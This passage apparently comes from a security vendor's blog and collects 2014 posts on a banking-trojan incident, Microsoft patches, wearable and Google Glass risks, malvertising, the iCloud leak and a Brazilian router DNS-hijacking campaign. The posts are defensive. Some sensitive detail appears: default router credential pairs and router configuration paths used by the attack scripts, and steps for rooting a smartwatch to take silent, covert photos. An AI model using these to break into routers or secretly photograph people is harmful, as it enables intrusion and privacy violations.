"Federal Taxation Service. Please provide all required documents as soon as possible."

The accountant would certainly have opened the attachment, which exploited a vulnerability in Microsoft Word to download a self-unpacking archive from a remote server and then initialize the unpacking. The archive contained two files: 'SYST.EXE', a renamed version of the file archiver '7zip', and 'SYST'.

While unpacking, the source archive launched the archive program 'SYST.EXE' with parameters instructing it to unpack the password-protected archive 'SYST' using the incorporated password. This trick of using a password-protected password successfully bypasses security software's attempts at static unpacking of the file, impeding its detection.

Unpacking 'SYST' created the following: the 'Backdoor.Win32.RMS' file (which we detected earlier) and the 'INST.CMD' script which installed the backdoor in the system. This is the script that copied the malicious program's files into the folder 'C:\windows\dotcom'.

After we detected the backdoors, we began to understand how the cybercriminals could steal the money. If they had remote access to the computer, they could have make their own payment order, and then the key file and the sender's IP address would be legitimate. But we still didn't know how they criminals got the password to access the banking software. We decided to look for a keylogger program.

The keylogger

The file 'Svchost.exe' attracted our attention, located in the root of the system disk. It turned out to be a keylogger (detection added with the verdict 'Trojan-Spy.Win32.Delf'); it also contained functionality to manage the configuration of Backdoor.Win32.RMS. This unusual capability was apparently introduced by the cybercriminals because they needed a tool to control the modified Remote Manipulator System: they had hidden this program's entire user interface and could use it to manage the configuration.

We also discovered that this keylogger was downloaded with the help of Backdoor.Win32.RMS.

The keylogger sent a log containing all stolen information to the C&C at regular intervals and kept an up-to-date copy of the log on the infected computer's hard drive. We found the banking password within the piles of information stolen by the keylogger.

The battle plan

Following our research, we reconstructed the cybercriminals' action plan:

  1. The cybercriminals launched a targeted attack using social engineering and a Microsoft Word vulnerability to infect the accountant's computer with Backdoor.Win32.RMS.
  2. With the help of that backdoor, the cybercriminals loaded two more malicious programs onto the victim computer: a keylogger (Trojan-Spy.Win32.Delf) and another backdoor (Backdoor.Win32.Agent) which establishes remote VNS access to the victim computer.
  3. The keylogger intercepted the password to the remote banking account.
  4. While the accountant was away from his computer, the cybercriminals used Backdoor.Win32.Agent and the VNS access to the computer to start the banking software on behalf of the accountant.
  5. The cybercriminals used the password intercepted by the keylogger to create a payment order worth 300,000 rubles and send it to the bank.
  6. A bit later, they created another payment order, this time worth 3 million rubles, and sent it to the bank.

As we got towards the end of the investigation, we discovered yet another interesting fact: the IP-addresses of C&C servers for all malicious programs used in the attack belonged to the same sub-network.

Diagram of the cybercriminal attack

We also found out that the cybercriminals acted very fast: it took them just four days to carry out their planned crime. Three days were spent preparing, and the plan was executed within just a few hours on the fourth day.

Day 1. The cybercriminals sent the email to the company's accountant. The accountant read the email, opened the attachment, and the malicious program Backdoor.Win32.RMS was downloaded to his program. On the following days, the cybercriminals used this program to watch the accountant's activities.

Day 4. The cybercriminals used Backdoor.Win32.RMS to load the keylogger Trojan-Spy.Win32.Delf to the victim computer and intercepted the password to the banking software. Soon afterwards they loaded Backdoor.Win32.Agent and used it to connect to the accountant's computer. Then they sent payment orders from the victim computer to the bank.

Notifying the cybercriminals' victims

As the cybercriminals used several IP addresses from the same sub-network, we decided to have a closer look at the C&C servers. As it turned out, the cybercriminals made a mistake when configuring one of the servers, so any user can see the HTTP requests to the C&C servers. That's how we were able to track down the IP addresses from which requests were sent using the keylogger's protocol. As we found out, there were several computers with different IP-addresses infected with the keylogger.

There was one odd feature of this keylogger: when it was launched on an infected computer, it downloaded the latest version of its log from the C&C server. Thus, any user could review the keylogger's log if they opened the appropriate URL address in their web browser. We decided to have a close look at the HTTP requests sent to the C&C server, and in them we found the names of the logs that the keyloggers sent to the C&C server. In many cases, the logs contained the name of the organization which owned the infected computer and the victims' contacts (We could also find the victims' IP addresses using the vulnerability in the C&C server). This information helped us contact other victims (most of them were accountants at SMBs) and warn them that their computers were infected. They were very grateful for the information.

Features of banking attacks

As we said at the beginning of the article, this attack is a typical case of stealing money from a company.

  1. Cybercriminals actively use social engineering to encourage users to open the malicious file.
  2. Members of staff who deal with commercially important information and handle the company's finances need training on the basics of IT security. The company must implement security policies that would minimize the risk of employee negligence causing an infection on the corporate network.

  3. When attacking important targets, cybercriminals may use new exploits for previously unpublished vulnerabilities. In such cases regular attack detection tools, such as IDS, are not good enough.
  4. However, 0-day exploits are too expensive to use in attacks on regular companies. Here we usually see exploits for known vulnerabilities. This means simple steps like promptly updating software (especially Microsoft Office and Java) and installing a quality security solution can ensure adequate levels of protection.

  5. Yet another feature of this attack is that it involves legal software. This is a growing trend: we see cybercriminals using legitimate applications to gain remote access to victim computer before downloading and launching malicious files on them.
  6. Security products obviously won't flag up the use of legitimate software. So cybercriminals can use these applications in a bid to keep their operations secret. In this attack, secrecy was ensured by using a version of Remote Manipulator System with modifications introduced into its executable file. We added a signature for this modified version of Remote Manipulator System so in future Kaspersky Lab's products will detect it.

    If cybercriminals use the original, unmodified versions of legitimate software, the only solution will be for security systems to notify the user every time a potentially unwanted program is launched. All users, especially those who deal with financial and other important documents, must remember that no security system can provide absolute protection. They should pay attention to system notifications and be alert to any anomalous behavior on their computer. It's important to notify security staff of any suspicious event in the system.

Ideally, default deny mode should be enabled on all computers used to make payments in a remote banking system; this mode restricts Internet access and prevents the launch of irrelevant, non-whitelisted software. The same applies to computers used by corporate users to work with commercially important (business-critical) information.

Conclusion

These days, the main driving force behind all cybercriminal actions is money. Gaining access to remote banking systems is the most direct and straightforward way of stealing money from an organization. It is little surprise that remote banking systems are an increasingly attractive target for cybercriminal attacks.

Anyone who uses remote banking systems is more than familiar with the security systems incorporated in them … but so are the cybercriminals. The use of passwords, key files and tokens, as well as restricting IP access, can lull users into a false sense of security.

However, none of these measures, whether taken individually or as a group, will do anything to enhance security if they are implemented on a compromised computer. On an infected machine, passwords can be intercepted, key files can be copied. Cybercriminals can create a hidden desktop and use the original IP address and the token connected to the victim computer.

When investigating security incidents we regularly encounter the following situation: a malicious program is launched on a computer, but later it is detected and removed from the system. Subsequently the affected computer is used as before, continuing to carry out banking transactions with the accountant confident that the problem has been solved.

Users must realize that once a malicious program is executed, the computer affected should be considered compromised. The first malicious file only loads the main malicious payload. That payload typically consists of programs which update themselves all the time to escape detection by security products. Alternatively, cybercriminals load legitimate software with modifications that enable cybercriminals to connect to it via malicious C&C servers. In this case the malicious programs will not be detected.

Overlooking this can cause huge damage to a company. If a malicious program has been detected on a computer with critical information, incident response measures must be taken immediately.

Sadly, our experience shows that organizations often sound the alarm too late, when they are already facing financial loss or the shutdown of critical computing services. Moreover, the response measures taken within corporations usually prove ineffective, and often impede further investigation.

There is no such thing as a one-size-fits-all response to an incident. There are too many possible attack methods out there. For example, in some cases shutting the computer down immediately helps to preserve data that would be irreversibly deleted by a malicious program after a certain period. In other situations, though, a shutdown will destroy the RAM data that is vital to a subsequent investigation. Only an incident investigation specialist can make the right decision.

In any case, if there is the slightest suspicion of intrusion, any compromised computer should be disconnected from the Internet and the corporate network, and malware incident specialists should be called in.

Only a detailed investigation of a security incident can lead to an effective response.

Microsoft Updates September 2014

Wed, 09/10/2014 - 20:54

Microsoft released four security bulletins this month addressing a total of 42 vulnerabilities in Internet Explorer (MS14-052), .NET (MS14-053), the Windows task scheduler (MS14-054), and several issues in Windows Lync Server (MS14-055). I counted a total of 37 cve set aside for Internet Explorer, with the other five for the three remaining software.

Most interesting is the XMLDOM vulnerability (cve-2013-7331), a vulnerability that has been publicly discussed since at least April 25, 2013. The PoC was re-purposed and abused in the VFW watering hole attack by APT otherwise known as Aurora Panda or "the DeputyDog actor". The crew is highly advanced and effective in technique and operation, over time deploying multiple 0day to meet their heavy offensive needs. Their xmldom trick likely helped to delay discovery of their IE 0day and presence on the compromised VFW server. "The attacker can easily diagnose whether the machine is running EMET by loading an XML string. If the parsed return code fails, it means EMET is not present and the attacker can proceed with the exploit". Microsoft rated this vulnerability patch "important" across OS versions, while the other privately disclosed IE vulnerabilities are rated "critical".

The other 36 Internet Explorer memory corruption vulnerabilities are all over the board as far as exploitability per platform, but they all enable remote code execution. It's most interesting that the patches for Internet Explorer v10 and v11 on supported Windows 8.1 are rated Critical RCE.

Also this month is a task scheduler escalation of privilege vulnerability reminiscent of one of the Stuxnet 0day that Kaspersky Lab researchers reported back in 2010, and was later deployed by the Tdss gang. And an update to an advisory went out to deal with post-exploitation lateral movement. This time the patched issue is not related to older pass-the-hash issues, but Kerberos ticket grant delay related. The logon credential cleanup package can be downloaded here.

More can be read about September 2014 Microsoft Security Bulletins here.

CTIA's Super Mobility Week 2014

Wed, 09/10/2014 - 14:31

The world's largest mobile innovation forum, "Super Mobility Week", is being held in Las Vegas. We were there to participate and moderate a panel on mobile and cloud cyber-security with speakers from Verizon, Samsung, and Eriksonn Mobile.

The event maintains an impressive vendor floor and multiple stages for discussions and panels throughout the days. The floor hosts vendors presenting their newest products, including wearables and other IoT. The afternoon keynotes yesterday brought a switch from the planned Twitter's CEO to their "President of Global Revenue" Mark Bain, who spoke about both their technology push onto wearables and IoT, and a glimpse into their data mining capabilities derived from their Gnip acquisition. It's notable that he didn't mention anything about security or privacy. Two factor authentication is ancient history for them, while Apple and their customers unfortunately continue to learn the hard way that some inconvenience is a small tradeoff for privacy and security.

Microsoft also keynoted, bringing their EVP of Devices Group onstage to discuss their push into mobile to cloud technologies with Nokia devices and "Cloud OS". Again, no mention of security baked into these technologies, although we haven't seen any recent naked celebrity photo theft from the Microsoft cloud.

My panel's discussion weaved mainly in and out of enterprise wide security challenges to BYOD and cloud adoption, along with recent and relevant threats that we noted:

1. The recent Apple iCloud mess revealed several things

  • Apple provided password and knowledge based authentication services that enabled social engineering and brute force attacks and dismissed 2FA (until now). On cloud service authentication security, Apple "led from behind"
  • Apple's cloud security enabled brute forcing of both AppleIDs and iCloud passwords
  • In general, mobile to cloud customers have no idea of where their data resides, if it or how much of it flows off of their mobile device, how many organizations have access to it, or how well it is secured

2. Mobile malware volumes continue to surge - our mobile malware collection now includes almost half a million samples. Digging deeper, in 2013, we saw around 600 mobile banking trojans and now our malware collection maintains around 8,500 banker variants specifically supporting financial cybercrime.

3. Wifi and Ssl insecurities, as implemented in and used by mobile technologies, are on the increase and will likely continue to be.

4. Targeted attackers express interest in an expanded set of technologies, including various mobile devices by the Rocra, LuckyCat and Chuli attackers.

The event lasts from September 9th to the 11th.

The world at your fingertips… and theirs too

Wed, 09/10/2014 - 06:00

Technology has changed our lives, the way we live and work. With the emergence of wearables, the convergence between the virtual and the physical world makes people feel more natural using technology all the time.Google Glass is one of the most amazing wearable devices and although it is still at an early stage of development, it is undeniable that you can do awesome things and experience the world in a different way with them.

With out-the-box functionality, you can search the internet, take pictures or videos, check mail, send messages to Hangouts contacts, or publish information to Google+. What truly excites us are foreseeable uses in fields like medicine or education. The device could become indispensable by helping surgeons check patient vital signs or video broadcasting their surgeries to other specialists. Similarly, we can foresee novel means of transmitting knowledge to students in interactive ways. Perhaps we can even imagine enhancements to law enforcement by enabling immediate recognition of wanted criminals.

Unfortunately, the emergence of new technologies also entails new security risks. There are in fact many concerns about potential risks to privacy and ways in which these new devices could be compromised. Cybercriminals don't rest and are always looking for new ways to obtain gains from their victims, whenever they see an opportunity they will work day and night to achieve this objective.

New Technologies, Old Risks.

New and existing devices have many things in common: they use the same protocols and are interconnected with other devices using similar applications. There is no way around this. Traditional attack vectors are mainly against the network layer in the form of Man-in-The-Middle (MiTM), the exploitation of some vulnerability in the operating system, or the applications themselves. Being based on Android, Glass could inherit known vulnerabilities found in other devices with the same OS.

There are two ways to surf the Web from Google Glass: through Bluetooth pairing to a mobile device that shares its data network connection, or directly through Wi-Fi with prior configuration of the network via a MyGlass account or mobile app generated QR code.

The procedure to add a network is pretty simple: by adding a network name and password a QR code is generated containing connection settings which when looked at through Glass establishes an automatic connection to the network.

Last year, a vulnerability was published by the Security firm Lookout related to this procedure that would mislead a user to connect to a fake access point through a malicious QR thus allowing a potential attacker to hijack network communications and possibly redirect navigation to a malicious web page that could exploit a known Android web vulnerability. This vulnerability was patched but gave us a clear sense that attackers could discover ways to compromise these new devices.

A source of potential risks is that unlike a computer or a mobile device, the Glass interface is navigated through 'cards' to scroll through the different applications and settings thus limiting configuration options and in some cases automating certain procedures and functions with little input from the user, as in the case of connecting to a network or sharing information. This automation opens the door for exploitation by attackers and the compromise of user privacy.

Another threat avenue is the propensity for users to activate 'debug mode' in order to install applications outside of the official glassware ecosystem thus raising the risk of installing malicious applications.

This opens the possibility of new attacks using old methods such as social engineering through the use of the magic words: "free" and "sex". Although not all apps advertised this way are malicious, the terms stand as a hook for users in search of new experiences, willing to step out of the comfort zone pre-arranged by the manufacturer.

One simple test

As mentioned earlier, a feature distinguishing Glass from other wearables is the ability to navigate the internet directly via a Wi-Fi connection, rather than exclusively piggybacking off of a paired mobile device. However, this ability also means that the device is exposed to network vectors attacks, particularly MiTM.

Imagine this scenario, you are at your favorite coffee shop and decide to connect to the Wi-Fi network using Glass. You set up the network and are off to check-in on Foursquare, launch an app to recognize the song playing in the background and fetch the lyrics. But what if in this network someone is using a tool to poison the other devices into redirecting traffic towards a router IP address thus capturing all of the network traffic?

We tested by doing just that in a controlled laboratory network. Once the network was compromised, we did some searches on google, standard site browsing, sent pictures and messages to some of our contacts, and even read the news.

Once we captured enough traffic to analyze, we found that almost all the traffic remains encrypted after the network was compromised, specially the google searches. However, we found enough information in plain text to correlate and piece together the user's navigation to airlines, hotels, and touristic destination sites and how and where the device was connected. Nothing too sensitive but in some cases useful for when carrying out a profiling job.

In the end, as with any other device, security must be visualized in layers and we need to protect every layer to reduce the risk of compromise. In this case, the network layer could be exposed since the device can connect to public networks but lacks the option for VPN connections thus insuring traffic can be captured and analyzed.

In coming months, we'll see wearable devices becoming the next attack targets, highlighting the need to pay special attention to these devices, their capabilities, and the information they handle.

You can also follow me on twitter @r0bertmart1nez

Wearable Security: Present and Future

Wed, 09/10/2014 - 06:00

Now that the Internet of Things is all the rage, I wanted to take a look at a trend in IoT that I find particularly exciting and that's wearable devices. In theory, wearables could present us with a paradigm shift in the manner in which users interact with technology, moving us away from the old mouse and keyboard combo, and possibly even the touchscreen. For now, we are not quite there and science fiction superlatives are premature. At this time, wearables are in simplest terms appendages of our mobile phones. They're meant to more conveniently convey notifications, collect heartbeat measurements, and throw an alternate camera angle into the selfie-filled mix. Though wearables are still in their infancy, rising adoption highlights the need for a discussion about the concerns that could accompany these new technologies. Let's attempt to carry out this discussion in two modes: current privacy issues and future overall security concerns.

With Creepy Enthusiasm

Sadly technology isn't always used in the benevolently child-like way we intend; gone are the days of look-what-I-can-do wonderment.

Source: http://www.killyourdarlingsjournal.com/wp/wp-content/uploads/2014/01/1963-jetsons-flintstones.jpeg

Instead, we see users adapting technologies old and new to satisfy base desires. A recent twitter-storm documented by Gawker showed just that, as a Chinese Glass Explorer was found using his new device to upload unsolicited pictures of women in public places to his twitter account. His actions fit into a reprehensible internet subculture of fetishizing 'creepshots' that has caused great uproar. Unfortunately, the principal design tenets of wearables have the unintended corollary of making perfect devices for this community of perverts.

With an unassuming device and a nearly undetectable camera, a wearable can be used as a predatory tool for violating the privacy of unsuspecting bystanders. During our Latin American Security Analysts Summit, Roberto Martinez and I took up the mantle of predatory wearable users, taking candid pictures of our guests to display during our presentation. I'm disappointed to say it was incredibly easy to get away with. In the case of Roberto's Glass, the wink feature (which allows the user to take a picture by simply winking in the direction of the target) was indispensable to our experiment. In my case, I had a Galaxy Gear 2 which Samsung had cautiously programmed to accompany pictures with a loud noise in order to alert nearby targets.

However, creepers will not be easily deterred! And a solution was swiftly proffered in the form of rooting and a handful of commands. Most people are familiar with the notion of rooting or jailbreaking a device these days. It is often touted as a means of retaking control of your device, away from the clutches of evil limiting corporations! In the case of the Gear 2, the uses of rooting are anything but benevolent. Rather than unleashing homebrew development creativity, the sole use of rooting the Gear 2 that I've been able to spot is to disable the moderately loud sound the device emits to notify passersby that they are in fact being photographed.

On more specific terms, the process includes the use of a leaked internal Samsung tool called ODIN in order to flash an alternate ROM onto the device that comes with root privileges enabled. Root privileges are not required in order to install applications themselves but will be necessary in order to mount the otherwise inaccessible filesystem. Once mounted, the creeper needs only zero-in on the folders that contain the camera notification sound files and move them elsewhere for safe-keeping. Thus, when a picture is being taken, the camera application will look for these files in vain and continue to take the picture sans shutter sound. Since the camera is quite discreetly placed, lacks a flash, and shows no other outward indication that a picture is being taken, this sound is a crucial privacy feature in the device's design.

With the Tizen Smart Developer Bridge (reminiscent of the Android Developer Bridge) in hand, semi-proficient users can also sideload applications in wgt format onto the device. In the case of video recordings, an altered camera app can be sideloaded that includes a single modified line within the package thus eliminating the pre-imposed limitation on video recording from a few seconds to as much as the cramped storage will allow. These two modifications allow a perverted user to turn the otherwise benevolent smartwatch into a rather creepy device.

The Less-Scrutinized Link in the Mobile Security Chain

An interesting implication arises from being able to sideload modified applications onto the device with such ease. Though Tizen applications are meant to go through a rigorous testing process, this process occurs on the side of the controlling device – in this case, the Galaxy S5 loaded with the Gear Manager app paired to the smartwatch. When an application is installed on the device through the Gear Manager app via bluetooth, there are no indications or notifications on the smartwatch that a new application has been installed. This goes to stress the perils of the simplified interfaces on most wearable devices and thus the importance of maintaining the integrity of the controlling mobile device. With Android being a primary target for mobile attackers, rising consumer interest in wearables is bound to be met by rising attacker interest in these devices as well, which brings us to the prospective side of our discussion…

Laymen cybercriminals are not the only one's interested in our devices. Sophisticated actors have a distinct interest in infecting mobile devices as these become the gateway for intimate information about individual targets not commonly found on corporate networks. Though I would in no way claim that wearables are being targeted by these actors at this time, there is a twofold appeal presented by wearables that make them a likely future target if widely adopted by consumers:

  • Firstly, the information wearables devices gather is going to attract new corporate players to the cyberespionage scene. If wearables are adopted by a large enough crowd, insurance companies interested in tweaking and improving their risk mitigation formulae will be jonesing to get their hands on the aggregated vital signs and unadulterated exercise details of their clients. This information could translate into real money for these companies and that sort of financial incentive is often enough to encourage less than ethical means of information gathering.
  • Secondly, we need to be wary and adopt a holistic approach towards the security of a chain of devices paired for data sharing. When it comes to a home or office network, securing endpoints isn't enough. Any device on the network, even if it's a printer or a seemingly harmless network storage device, can represent an entry point or means of persistence for an attacker. The same occurs with mobile devices and their less sophisticated accessories.

In an espionage campaign, breaching the security of a mobile device is only the beginning. Oftentimes, valuable information will become available with long-term access to the device as the unsuspecting target goes on about their everyday dealings. Given that security solutions are already deployed on mobile platforms, less sophisticated appendages such as wearables connected to mobile devices could become particularly interesting to advanced threat actors looking for a means of persistence with a lower probability of detection. In this case, resilience and discreet execution are gold standards, and what is more discreet than operating within a device whose simplified interface and inaccessible filesystem essentially insure that the breach will never be detected by even the most competent users?

Gaps in corporate network security: ad networks

Fri, 09/05/2014 - 08:42

'Malvertising' is a relatively new term for a technique used to distribute malware via advertising networks, which have long since become a popular medium among cybercriminals. In the past four years, hundreds of millions of users have fallen victim to 'viral' advertising, including visitors to major media sites, such as NY Times, London Stock Exchange, Spotify, USNews, TheOnion, Yahoo!, and YouTube. The complicated situation with ad networks even prompted the United States Senate Permanent Subcommittee on Investigations to conduct an in-depth inquiry, which produced recommendations on stepping up security and increasing the responsibilities of advertising platform owners.

At the turn of the year 2.5 million Yahoo users were attacked. Soon after the incident, a company called Fox IT published a detailed analysis of the attack. Curiously, according to Fox IT, not all Yahoo! users were affected by the attack – only residents of European countries, primarily Romania, the UK and France. Fox IT analysts believe that the attackers probably used targeted advertising mechanisms, i.e., they paid for 'impressions' served to a certain audience from the countries mentioned above. Here is an illustration of how attacks are conducted via ad networks: an overall attack organization diagram (on the left-hand side) and a specific example of the attack against Yahoo! users (on the right-hand side).

In the past, we have written about targeted attacks conducted via trusted websites (so-called watering-hole attacks) and social engineering on social networks and in IM clients. Specifically, we wrote that a cybercriminal has to do two things in order to implement a watering-hole attack: first, compromise a trusted website and second, surreptitiously inject malicious scripts into the site's code. Successful attacks via social networks or IM clients also make certain demands of cybercriminals – at the very least, to win the users' trust and increase the chances of them clicking on links sent by the attackers.

What sets attacks via ad networks apart is that in these attacks the cybercriminals do not have to compromise websites or gain the trust of potential victims. All they have to do is find an ad provider from which to buy 'impressions' or become a provider themselves (like BadNews). The remaining work, related to distributing malicious code, will be done by the ad network –the trusted site itself will download malicious scripts to its page via iframe.

Moreover, users don't even have to click on the ads – as part of its attempt to display a banner on the web page, the browser executes the banner's SWF/JS code, which automatically redirects the user to a site hosting the landing page of a popular exploit pack, such as Blackhole. A drive-by attack will follow: the exploit pack will attempt to choose an appropriate exploit to attack a vulnerability in the browser or its plugins.

The problem of ad networks being used to distribute malware and conduct targeted attacks (taking advantage of their targeted advertising capabilities) does not only affect those who use browsers to access websites. It also applies to users of applications that can display adverts, such as IM clients (including Skype), email clients (Yahoo! included), etc. And, most importantly, the problem affects the huge number of mobile app users, since these apps also connect to ad networks!

Essentially, mobile applications are different in that the SDKs commonly used for embedding adverts into apps (such as AdMob, Adwhirl etc.) do not support the execution of arbitrary code supplied by ad providers, as is the case with website advertising. In other words, only static data is accepted from the server supplying ads, including images, links, settings etc. However, cybercriminals can also create SDKs, just like media companies. The former offer developers higher per-click rates than their legitimate competitors. This is why developers of legitimate mobile software embed malicious 'advertising' code – essentially backdoors – into their apps. Moreover, legitimate SDKs may have vulnerabilities enabling the execution of arbitrary code. Two such cases were identified late last year – one involving the HomeBase SDK, the other involving AppLovin SDK.

Source: http://researchcenter.paloaltonetworks.com

The question "How should a corporate network be protected against attacks conducted via ad networks?" does not have a simple answer, particularly if you keep in mind possible targeted attacks. As we mentioned before, protection needs to cover not only workstations (browsers, IM clients, email clients and other applications that have dynamic advertising built into them), but also mobile devices that can access the corporate network.

Clearly, protecting workstations requires at least a Security Suite class anti-malware solution, which must include:

  • protection against vulnerability exploitation;
  • advanced HIPS with access restriction features, as well as heuristic and behavioral analysis (including traffic analysis);
  • tools for monitoring the operating system (System Watcher or Hypervisor) in case the system does get infected.

For more reliable protection of workstations, it is prudent to use application control technology, collect statistics (inventory) on the software used on the network, set up updating mechanisms and enable Default Deny mode.

Unfortunately, compared to the protection of workstations, mobile device protection is still in the early stages of evolution. It is extremely difficult to implement a full-scale Security Suite or Application Control solution for mobile devices, since that would require modifying firmware, which is not always possible. This is why Mobile Device Management (MDM) technology is currently the only effective tool for protecting mobile devices that connect to the corporate network. The technology can control which applications are allowed to be installed on a device and which are not.

Cybercriminals have used ad networks to distribute malware for years. At the same time, the advertising market is rapidly growing, branching out into new platforms (large websites, popular applications, mobile devices), attracting new advertisers, partners, intermediaries and aggregators, which are intertwined into an extremely tangled network. The ad network problem is one more example showing that rapid technology development is not always accompanied by the corresponding evolution of security technologies.

Protecting yourself against the celebrity iCloud hackers

Wed, 09/03/2014 - 14:51

The biggest security news of the week is the leaked photos of many celebrities. Many people, especially the involved celebrities, wondered how such a hack could take place.

The initial statement by the attacker was that the iCloud was hacked. This prompted Apple into their we-do-not-really-comment-until-we-have-done-our-research mode. Today, they released a statement on the incident:

https://www.apple.com/pr/library/2014/09/02Apple-Media-Advisory.html

For me the most interesting quote is: "accounts were compromised by a very targeted attack on user names, passwords and security questions, a practice that has become all too common on the Internet."

Apple is thus well aware of the problems that arise with these forms of authentication. The more interesting is their advice: strong passwords and two-step-verification.

Strong passwords are, according to Apple, passwords with a minimum of 8 characters, with some additional requirements. Interesting enough they do not enforce of all their suggestions. A password such as "Password1" is acceptable, even though it can be easily guessed.

Their other advice, using two-factor-authentication is somewhat flawed. For instance, it does not protect your iCloud backups (see this post). Also, two-step-verification is not available in every country. If you use, for example, a Romanian or a Croatian telephone number, then bad luck. Considering that Google offers two factor authentication for such countries as well, one might wonder why Apple didn't implement it as well. Could it be the cost of the SMSes?

So how to protect yourself properly? My colleague Alex Savitsky wrote an excellent article about this.

To summarize:

  • Use strong and unique passwords that are easy to remember and hard to crack (for instance, a phrase in your native language with "spaces" in it, a number and a special char)
  • If available in your country, enable two-factor authentication
  • iPhone users may want to disable iCloud photo Stream / photo Sharing. Additionally iPhone users may want to delete the backup of their photos / iPhone in the iCloud.

Photo courtesy of my colleague Dmitry Bestuzhev - https://twitter.com/dimitribest/status/506820178320322560

And remember - if you don't want your private photos to get leaked, better not take them in the first place!

Web-based attack targeting home routers, the Brazilian way

Tue, 09/02/2014 - 13:53

We spotted an interesting attack from Brazilian bad guys aiming to change the DNS settings of home routers by using a web-based attack, some social engineering, and malicious websites. In these attacks the malicious DNS servers configured in the user's network device are pointed towards phishing pages of Brazilian Banks, programmed to steal financial credentials.

Attacks targeting home routers aren't new at all; in 2011, my colleague Marta described malware targeting network devices like these. In Brazil we documented a long and painful series of remote attacks that started in 2011-2012 that affected more than 4.5 million DSL modems, exploiting a remote vulnerability and changing DNS configurations. But this "web-based" approach was something new to Brazilian bad guys until now and we believe it will spread quickly amongst them as the number of victims increases.

The attack starts with a malicious e-mail and a bit of social engineering, inviting you to click:

"I'm your friend and want to tell you you're being cheated, look at the pics"

How many people believe in it? Well, many: 3.300 clicks in 3 days, with most of the users located in Brazil, US and China, probably Brazilians living there or people that understand Portuguese:

Shortened URLs are a cheap way for the bad guy measure their 'performance'

The website linked in the message is full of adult content, porn pics. While in the background it starts running scripts. Depending on your configuration, at some point the website may ask for the username and password of your wireless access point – if it has, this is a good thing. If not, this may be a problem for you:

The script located in the website will try to guess the password of your home router. It tries several combinations such as "admin:admin":

or "root:root"

or "admin:gvt12345" (GVT is a big Brazilian ISP):

The scripts will continue trying combinations that point to the control panel of your network device such as [your-router-IP].rebootinfo.cgi or [your-router-IP].dnscfg.cgi?. Each script includes the commands to change the primary and secondary DNS servers. If you're using default credentials in your home router, there won't be an interaction and you'll never realize that the attack has occurred. If you're not using default credentials, then the website will pop up a prompt asking you to enter it manually.

We found Brazilian bad guys actively using 5 domains and 9 DNS servers – all of them hosting phishing pages for the biggest Brazilian Banks. The malicious websites used in the attacks are filtering direct access by using HTTP referrers, thus aiming to prevent direct access from security analysts.

So how do you protect yourself? Make sure you're not using the default password in your home router and NEVER enter your credentials into any website asking for them. Our Kaspersky Internet Security is also prepared to block such scripts automatically.

Internet predators

Mon, 09/01/2014 - 05:30

Anyone using the Internet is at risk, regardless of age and regardless of what they like to do online. Cybercriminals can deploy an impressive arsenal, targeting everyone from schoolchildren to pensioners and following them whether they are logged on to social networks, checking the latest headlines or watching their favorite videos. Internet scammers want access to our money, our personal data and the resources of our computer systems. In short, they want anything that they can profit from.

There are a huge range of different attacks facing us on the net: users can get caught by ransomware like Gimeno or Foreign, become part of the Andromeda botnet, see ZeuS/Zbot drain the cash from their bank accounts, or have their passwords compromised by Fareit spyware. Usually web attacks try to download and install an infected executable file on the target computer, but there are some exceptions, for instance XSS or CSRF, which execute embedded HTML code.

Attack mechanism

For an attack to succeed, first of all users need to connect to a malicious site that downloads an executable file onto their computers. To tempt users to the resource, scammers might send them a link by email, SMS or via a social network. They might also try to promote their site via search engines. One further technique is to hack a popular legitimate resource and turn it into an instrument to attack its visitors.

Downloading and installing malware can be done in one of two ways. The first, a hidden drive-by download, relies on using a vulnerability in the user's software. The user of the infected site is often completely unaware that the computer is installing the malware, as usually there are no indications that this is happening.

The second method uses social engineering, where users are tricked into downloading and installing malware themselves, believing it is an updated flash player or some similar popular software.

Diagram of Internet attacks showing how executable malware files can be downloaded

Malicious links and banners

The simplest way to lure victims to malicious sites is simply to display an attractive banner with a link. As a rule sites with illegal content, pornography, unlicensed software, films etc. are used as a host. Such sites can work "honestly" for a long time to build up an audience before they start hosting banners with links to malicious resources.

One popular infection method is malvertising, or the redirecting the user to a malicious site with the help of hidden banners. Dubious banner networks attract site administrators with high payments for 'click-throughs' on their ads and frequently earn money "on-the-side" by spreading malware.

When users enter the site displaying these banners, a so-called "pop-under" opens in the victim's browser. This is similar to a pop-up window, but it appears either under the main window of the site, or on an otherwise inactive neighboring tab. The contents of these "pop-unders" often depend on the location of the visitor to the site - the inhabitants of different countries are redirected to different resources. The visitors of one country might simply be shown an advert for example

Site sends American visitors to the resource watchmygf[]net

Site sends Russian visitors to the resource runetki[]tv\

…whereas visitors from other countries will be attacked by exploit packs.

An inhabitant of Japan is attacked by an exploit and infected with the Zbot spyware Trojan

On occasion these malicious banners can even penetrate into honest banner networks, despite careful scrutiny by administrators. Cases like this have affected the Yahoo Advertising banner network and even YouTube.

Spam

Spam is one of the most popular means of attracting victims to malicious resources. It includes messages sent by email, SMS and instant communications systems, via social networks, private messages on forums and comments in blogs.

A dangerous message might contain a malicious file or a link to an infected site. To encourage the user to click on a link or a file social engineering is used, for example:

  • the name of a real organization or person is used as the sender's name,
  • the letter pretends to be part of a legitimate mailshot or even a personal communication,
  • the file is presented as a useful program or document.

During targeted attacks, when cybercriminals specifically attack a certain organization, the malicious letter might mimic a letter from a regular correspondent: the return address, content and signature could be the same as a genuine letter, for example from a partner of the company. By opening the attached document with a name like "invoice.docx" users put their computers at risk of infection.

Black Search Engine Optimization

SEO or Search Engine Optimization is a collection of techniques to raise the position of a site in the results given by search engines. Modern users often go to search engines to find necessary information or services, so the easier it is to find a given site the more visitors it will get.

In addition to legitimate methods of optimization, those that are permissible in the eyes of the search engines, there are forbidden techniques that fool search engines. A site might "promote itself" with the help of a botnet - thousands of bots make certain search requests and select the malicious site, raising its rating. The site itself may adopt a different appearance depending on who has entered it: if it is a search robot it will be shown a page relevant to the request, if it is a normal user it will be redirected to a malicious site.

Also links to the site are distributed in forums and other sites known to search engines using special utilities, which raise the rating of the site and, consequently, its position in search results.

As a rule, sites that use black search optimization are actively blocked by search engine administrators. For this reason they are created by the hundred using automatic instruments.

Infected legitimate sites

Sometimes cybercriminals infect popular legitimate sites in order to spread their programs. These might be high-traffic news resources, internet shops or portals and news aggregators.

There are two common ways to infect sites. If a software vulnerability was detected on the target site, malicious code can be inserted (for instance an SQL injection). In other cases the malefactors obtain authentication data from the site administrator's computer using one of the many Trojan spyware programs or using phishing and social engineering and seize control of the site. Once under the control of the criminals, the site can be infected in one way or another. The simplest approach is to use a hidden iframe tag with a link to the malicious resource added to the HTML code of the page.
